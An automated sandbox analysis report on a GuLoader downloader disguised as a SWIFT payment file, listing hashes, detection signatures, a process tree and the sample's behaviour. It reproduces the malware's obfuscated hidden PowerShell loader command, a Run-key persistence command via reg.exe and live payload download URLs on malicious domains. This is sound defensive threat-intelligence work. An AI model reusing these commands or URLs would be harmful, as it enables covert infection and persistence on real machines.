Edit tour

Windows Analysis Report
New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Overview

General Information

Sample name:	New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
Analysis ID:	1410987
MD5:	724ac474c4fcaa1df6da3f9245ac9c85
SHA1:	c68cc50c2bd9e44c87fbca76c4ebd0c7b9942b3d
SHA256:	d223088dd0d29e76253a5cfcbf1cfaf05312285f2f2f60aeafc6e8a96efcbcde
Tags:	exenjrat
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Machine Learning detection for dropped file

Machine Learning detection for sample

Obfuscated command line found

Powershell drops PE file

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Dosfuscation Activity

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe (PID: 6772 cmdline: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe MD5: 724AC474C4FCAA1DF6DA3F9245AC9C85)

powershell.exe (PID: 7108 cmdline: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe" /c "set /A 1^^0 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Vitis.exe (PID: 7512 cmdline: C:\Users\user\AppData\Local\Temp\Vitis.exe MD5: 724AC474C4FCAA1DF6DA3F9245AC9C85)

cmd.exe (PID: 7568 cmdline: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7628 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2926040964.00000000018C7000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000001.00000002.2601234406.0000000008F67000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), CommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ParentImage: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ParentProcessId: 6772, ParentProcessName: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ProcessCommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), ProcessId: 7108, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bortopereringer

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)", ProcessId: 7628, ProcessName: reg.exe

Sigma detected: Potential Dosfuscation Activity

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, CommandLine: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7108, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe" /c "set /A 1^^0, ProcessId: 7176, ProcessName: cmd.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), CommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\Vitis.exe, ParentImage: C:\Users\user\AppData\Local\Temp\Vitis.exe, ParentProcessId: 7512, ParentProcessName: Vitis.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes), ProcessId: 7568, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), CommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ParentImage: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ParentProcessId: 6772, ParentProcessName: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, ProcessCommandLine: powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading), ProcessId: 7108, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Vitis.exe

ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

ReversingLabs: Detection: 57%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Vitis.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Joe Sandbox ML: detected

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2592272811.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2599516690.0000000008435000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000001.00000002.2596714001.000000000712F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2592272811.0000000000B05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdbN source: powershell.exe, 00000001.00000002.2596714001.000000000712F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2596714001.00000000070C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2592272811.0000000000B05000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_0040290B FindFirstFileW,	7_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_00405C13
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_0040683D FindFirstFileW,FindClose,	7_2_0040683D

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: g-eurasia-ru.com

Source: Vitis.exe, 00000007.00000002.2938761024.000000001E350000.00000004.00001000.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.0000000002477000.00000004.00000020.00020000.00000000.sdmp, Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.bin
Source: Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binA
Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binD
Source: Vitis.exe, 00000007.00000002.2938761024.000000001E350000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binDomiPhaclg-logistic.com.ua/toys/ZfUdfOc32.binSlanOelmig-pal
Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binM
Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binZ
Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binh
Source: Vitis.exe, 00000007.00000002.2926772694.0000000002473000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binu
Source: Vitis.exe, 00000007.00000002.2926772694.000000000242D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://g-eurasia-ru.com/fan/ZfUdfOc32.binz
Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, Vitis.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2592920909.00000000049E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2592920909.00000000049E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2592920909.0000000004B36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2595448132.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056A8

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Vitis.exe

Jump to dropped file

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		7_2_004034F7

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File created: C:\Windows\resources\0809\gladiest	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	File created: C:\Windows\resources\sans.lnk	Jump to behavior

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Code function: 0_2_00406BFE	0_2_00406BFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_069EF3F8	1_2_069EF3F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_069EF0B0	1_2_069EF0B0
Source: C:\Users\user\AppData\Local\Temp\Vitis.exe	Code function: 7_2_00406BFE	7_2_00406BFE

Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe, 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamegstelistes hjuledes.exeDVarFileInfo$ vs New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
Source: New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Binary or memory string: OriginalFilenamegstelistes hjuledes.exeDVarFileInfo$ vs New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
